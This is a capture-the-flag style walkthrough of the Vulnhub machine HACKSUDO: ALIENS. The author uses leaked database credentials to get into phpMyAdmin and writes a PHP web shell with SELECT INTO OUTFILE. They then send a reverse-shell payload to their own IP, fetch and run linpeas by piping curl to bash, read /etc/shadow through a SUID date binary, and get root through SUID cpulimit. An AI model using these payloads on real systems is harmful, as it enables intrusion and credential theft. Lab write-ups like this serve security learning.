Vulnhub: HACKSUDO: ALIENS
HACKSUDO: ALIENS
This box should be easy . This machine was created for the InfoSec Prep Discord Server (https://discord.gg/tsEQqDJh)
This is HACKSUDO: ALIENS from Vulnhub. I also did COLDDWORLD: IMMERSION which was LFI to SSH login to editing a python script. I don’t have anymore to say about that.
Ports
SSH, plus HTTP on ports 80 and 9000.
HTTP/9000
This has got phpMyAdmin, which isn’t working with any kind of default creds. I enumerate the webserver and find some stuff, but nothing too interesting.
HTTP/80
This has stuff about aliens. Let’s look around:
┌──(root💀kali)-[/opt/vulnhub/hacksudo]
└─# python3 /opt/dirsearch/dirsearch.py -u http://192.168.1.195
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10848
Error Log: /opt/dirsearch/logs/errors-21-04-09_07-30-48.log
Target: http://192.168.1.195/
Output File: /opt/dirsearch/reports/192.168.1.195/_21-04-09_07-30-48.txt
# snip
[07:30:51] 200 - 16B - /README.md
[07:30:55] 301 - 315B - /backup -> http://192.168.1.195/backup/
[07:30:55] 200 - 941B - /backup/
# snipWhat’s in backup? mysql.bak. What’s in that?
Database credentials
user=”vishal”
password=”hacksudo”
host=”localhost”
With this, we can login to phpMyAdmin.
phpMyAdmin
After I’ve looked around, grabbed some hashes and had a go at cracking them, then tried password reuse on SSH with no success, I use a SQL statement to create a PHP file on the server:
SELECT "<?php system($_GET['cmd']);?>" INTO OUTFILE '/var/www/html/cmd1.php'This works and I use it to get a shell:
GET /cmd1.php?cmd=php+-r+'$sock%3dfsockopen("192.168.1.192",1234)%3bexec("/bin/sh+-i+<%263+>%263+2>%263")%3b' HTTP/1.1
Hacksudo
I run linpeas:
www-data@hacksudo:/dev/shm$ curl https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh | bash
Which shows that date has the SUID bit; GTFOBins gives a file read:
LFILE=file_to_read
sudo date -f $LFILE
I use this to read the shadow file, and then send the hash for hacksudo to john, where it cracks. Now, we can SSH in as hacksudo.
Root
──(root💀kali)-[/opt/vulnhub/hacksudo]
└─# ssh [email protected] 1 ⨯
[email protected]'s password:
Linux hacksudo 4.19.0-16-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Apr 4 02:12:24 2021 from 192.168.43.217
hacksudo@hacksudo:~$ pwd
/home/hacksudoI run linpeas again, and we have cpulimit with the SUID bit in our home directory. Again, it’s GTFOBins:
hacksudo@hacksudo:~/Downloads$ ./cpulimit -l 100 -f -- /bin/sh -p
Process 31419 detected
# id;hostname
uid=1000(hacksudo) gid=1000(hacksudo) euid=0(root) egid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),112(bluetooth),116(lpadmin),117(scanner),1000(hacksudo)
hacksudo
# cd /root
# ls -lash
total 40K
4.0K drwx------ 4 root root 4.0K Apr 4 01:35 .
4.0K drwxr-xr-x 19 root root 4.0K Apr 3 09:56 ..
4.0K -rw------- 1 root root 1.7K Apr 3 13:43 .bash_history
4.0K -rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc
4.0K drwx------ 2 root root 4.0K Mar 28 08:18 .cache
4.0K drwxr-xr-x 3 root root 4.0K Apr 3 09:22 .local
4.0K -rw------- 1 root root 1.1K Apr 3 10:18 .mysql_history
4.0K -rw-r--r-- 1 root root 148 Aug 17 2015 .profile
4.0K -r-------- 1 root root 552 Apr 4 01:35 root.txt
4.0K -rw-r--r-- 1 root root 227 Apr 3 13:22 .wget-hsts
# cat root.txt
# snip ascii art
congratulations you rooted hacksudo alien56...!!!
flag={d045e6f9feb79e94442213f9d008ac48}So fairly easy, but I don’t think I’ve done the SQL to outfile in phpMyAdmin before.